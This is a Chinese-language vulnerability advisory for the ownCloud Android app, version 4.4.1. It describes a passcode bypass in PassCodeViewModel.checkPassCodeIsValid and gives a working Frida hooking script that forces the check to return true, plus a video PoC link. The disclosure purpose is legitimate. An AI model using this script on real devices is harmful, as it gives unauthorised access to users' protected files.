Owncloud android apk 版本 4.4.1 中的一个问题允许物理邻近的攻击者通过 PassCodeViewModel 类(特别是 checkPassCodeIsValid 方法)提升权限。
不正确的访问控制
Owncloud
Owncloud android apk - 4.4.1
com.owncloud.android.presentation.security.passcode.PassCodeViewModel
PassCodeViewModel 类在应用程序中管理密码验证的逻辑。 该类中的 checkPassCodeIsValid 方法负责判断输入的密码是否有效。
使用 Frida 脚本挂钩 PassCodeViewModel 类中的 checkPassCodeIsValid 方法。 修改该方法实现,使其始终返回 true,从而绕过实际的密码验证。
在应用运行时执行 Frida 脚本。 用户输入的任何密码都将被视为有效,允许未授权访问。
Java.perform(function() { // Locate the PassCodeViewModel class in the target application var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');
// Hook the checkPassCodeIsValid method to modify its behavior PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true return true;
};
});
视频 PoC 链接 : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing
该漏洞是一个客户端安全绕过漏洞。它影响那些依赖密码功能保护敏感数据或限制某些应用功能访问的用户。通过利用此漏洞,攻击者可以绕过密码检查,获得对应用程序中本应受保护区域的未授权访问,可能暴露用户数据或允许在应用程序内执行未授权操作。